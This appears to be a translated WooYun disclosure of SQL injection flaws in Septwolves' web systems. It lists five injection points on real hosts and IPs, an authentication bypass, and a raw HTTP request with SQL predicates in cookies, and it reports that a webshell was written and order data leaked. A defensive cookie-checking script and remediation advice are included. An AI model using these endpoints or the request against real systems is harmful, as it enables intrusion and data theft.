
Vulnerability summary

Defect ID: wooyun-2016-0171689

Title: Septwolves (七匹狼) multiple SQL injection vulnerabilities (webshell / order details leak)

Vendor: Septwolves (七匹狼)

Author: 麦兜

Submitted: 2016-01-21 17:58

Fix time: 2016-03-05 09:52

Published: 2016-03-05 09:52

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-01-21: Actively contacting the vendor and awaiting vendor acknowledgement; details not disclosed publicly
2016-03-05: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

A SQL injection vulnerability was used to write a shell, connect to an intranet database, and leak order data.

Detailed description:

Injection point 1:
http://eoa.septwolves.net:8084/carddata.aspx?uid=chenxiaom
Injection point 2:
http://218.107.193.6:8200/login.aspx (authentication bypass via a "universal password"; the field is length-limited)
Injection point 3:
After logging in through injection point 2, replace the cookie values; the injection here runs with DBA privileges.

POST /CartList.aspx HTTP/1.1
Host: 218.107.193.6:8200
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://218.107.193.6:8200/CartList.aspx
Cookie: supwhere=1=1; userwhere=1=1; GroupWhere=1=1; LargeWhere=1=1; LittleWhere=[TypeCode]='13'; AttrWhere=1=1; CompanyWhere=1=1; GradeWhere=1=1; ASP.NET_SessionId=xpbyrz55kqp3b5453oxs4j45; ASPSESSIONIDQQDTRRRS=KOMLIDDAGHEPEFAMBHIAABDH; ASPSESSIONIDSSARSQQS=PAGBPEDAFOMDPMBCBIPNPFBD; lang=zh-cn; theme=default; sid=082c7u3q4rd6jj7vfvk948pqh0; windowWidth=1391; windowHeight=636; PHPSESSID=4hbaoga8pc9ku8gm07mgc23if6; UserClass=2; OLO_Name=740DC7B057169B3CCBF7773D032FCA6E15886363CF77CFB61828372E67A21521F9AEDF7D6702825765FDE30691F6EF41DD632BA0FEEED9433ACB52E75B42E69E42971192DAB2E40F580E04BD26262F57DD2D8DEF6F54D9C66CEE6CE0D22B9093E64AA372F6FA5C1166A566EC2F1D6D67E87006D1BAA493486BB5BB4171C4002C736988CF6978891D0202F31220CF340B2B2877D8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 188
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE2OTc0NTI0OTZkGAEFCUdyaWRWaWV3MQ88KwAKAQgCAWQ%3D&txt_keyword=a&ddl_dept=&ddl_class=&Button1=%E6%90%9C%E7%B4%A2&txt_sl=2


Injection point 4:
http://59.61.84.241:8087/hpzx/infoshow.asp?id=343
Injection point 5:
http://218.107.193.6:8082/SysAction.aspx?sysid=3
The DBA privileges from injection point 3 were used to write a shell; the path can be seen here:
http://59.61.84.241:9091/phpinfo.php
I ran ipconfig with the DBA execution privileges and compared it with the IP in phpinfo, and found that the two sites are on the same server.
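The request above carries SQL predicates in cookie values (`supwhere=1=1`, `LittleWhere=[TypeCode]='13'`), which the application concatenates into its WHERE clauses. As an added defensive example that is not part of the original report, the following Python script parses such a Cookie header and flags cookies whose values are SQL predicates rather than data, the check a WAF rule or log review would apply here; the sample header is constructed from the report's request with session values shortened.

```python
"""Flag HTTP cookies whose values are raw SQL predicates (e.g. ``supwhere=1=1``)."""
import re
from typing import Dict, List

# Constructed sample, abridged from the Cookie header in the report above
# (session cookies shortened; the *Where cookies are kept exactly as shown).
SAMPLE_COOKIE_HEADER = (
    "supwhere=1=1; userwhere=1=1; GroupWhere=1=1; LargeWhere=1=1; "
    "LittleWhere=[TypeCode]='13'; AttrWhere=1=1; CompanyWhere=1=1; "
    "GradeWhere=1=1; ASP.NET_SessionId=xpbyrz55kqp3b5453oxs4j45; lang=zh-cn"
)

# Patterns indicating a cookie value is a SQL predicate rather than plain data.
SQL_FRAGMENT_PATTERNS = [
    re.compile(r"^\s*\d+\s*=\s*\d+\s*$"),              # tautology such as 1=1
    re.compile(r"\[[A-Za-z_]\w*\]\s*=\s*'[^']*'"),      # [Column]='value' (T-SQL style)
    re.compile(r"(?i)\b(or|and|union|select|exec|xp_\w+)\b"),
    re.compile(r"--|/\*"),                              # comment sequences
]


def parse_cookies(header: str) -> Dict[str, str]:
    """Split a Cookie header on ';', keeping everything after the first '=' as the value."""
    cookies: Dict[str, str] = {}
    for part in header.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")
        cookies[name.strip()] = value.strip()
    return cookies


def find_sql_fragments(header: str) -> List[str]:
    """Return the names of cookies whose values match a SQL-fragment pattern."""
    hits: List[str] = []
    for name, value in parse_cookies(header).items():
        if any(p.search(value) for p in SQL_FRAGMENT_PATTERNS):
            hits.append(name)
    return hits


if __name__ == "__main__":
    # All eight *Where cookies from the report are flagged; session and lang cookies are not.
    print(find_sql_fragments(SAMPLE_COOKIE_HEADER))
```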

Proof of vulnerability:

[Screenshots: 7psql1.png, 7psql3.png, 7psql4.png, 7psql5.png, 7pconfig.png, 7p订单.png]

Remediation:

First, move all of these services onto the intranet and reach them through a VPN. Then filter input. Reduce the database account's privileges.

Copyright notice: please credit the source when reposting: 麦兜@乌云


Vulnerability response

Vendor response:

Vendor could not be contacted, or the vendor actively refused

Vulnerability Rank: 15 (WooYun rating)